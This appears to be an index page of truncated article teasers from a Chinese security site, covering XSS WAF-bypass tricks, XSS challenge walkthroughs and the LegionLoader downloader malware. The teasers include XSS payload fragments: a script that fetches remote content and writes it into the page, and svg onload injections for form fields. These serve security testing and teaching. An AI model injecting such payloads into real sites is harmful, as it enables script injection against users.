<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.o...
Cloudflare Xss Bypass Tips
poc:<select> <style> </select><svg onload=alert (1) ></style >"> &l...
XSS — 使用 Hex 溢出绕过 WAF
今天,我将写我如何使用 Hex Overflow 绕过 BIG IP Local Traffic Manager (F5 Networks) Web 应用程序防火墙的文章。 故事会直线发展,但实际上情...
XSS绕过WAF之on属性
日常测试的时候遇到的一个case,存在XSS漏洞,但是WAF把 onload,onerror,onstart等常用的on属性都过滤了。通过搜索,找到一段遍历所有on属性的代码。let results ...
C/C++ 编写的下载器-LegionLoader
研究 LegionLoader 是一种用 C/C++ 编写的下载恶意软件,于 2019 年首次出现在野外。它也有其他名称,包括 Satacom 和 RobotDropper,并被 Mandiant 跟...
Bug Bounty Tips 0004
a.注册时在用户名,邮箱等字段测试XSS使用构造的代码进行注册,看登录后是否会触发xss。 # 用户名字段:<svg/onload=confirm(1)># 邮件字段:"><s...
LegionLoader滥用Chrome扩展传播多种恶意软件
据gbhackers消息,名为LegionLoader 的恶意软件正通过Chrome 扩展分发窃密软件,包括对受害者实施电子邮件操纵、跟踪浏览,甚至将受感染的浏览器转变为攻击者的代理服务器,使其能够使...
关于 XSS 的一些搜集
关于 XSS 的一些搜集 XSS,没落的漏洞之王 这篇总结了一下关于 XSS 的一些思考、实践利用经验以及搜集的各种 payloads 关于 XSS 的一些想法 四步法: 输出点在哪 如何闭合原语句(...
【XSS Game】攻防实战全记录
心若有所向往,何惧道阻且长1、Ma Spaghet!审查源码一个不安全的方式,直接get传输somebody输入123看看位置?somebody=123如下用下input标签即可<input o...
偶遇Markdown类型的Self xss
目录 今天遇到了一个Markdown的编辑器,打开后看了一下。突然想到之前在之前遇到的一个Markdown Self xss,心想这个是不是也会有同样的问题?于是测了一下,结果还真找出来了。更巧的是,...
【XSSed】攻防实战全记录
最后救你一次,不要让欲望击溃你的意志首先整体浏览网站进入Level1 Basic XSS首先整体浏览网站对源码进行分析漏洞产生于如下代码段:echo($_GET['q']);直接将用户输入插入了htm...
[xss bypass]补0绕过
--->目录<---0x01——前言0x02——bypass--->前言发现个测试点,其中“name”参数的值显示在“iframe”标签内。页面源代码可以看到双引号"正常显示但是(和...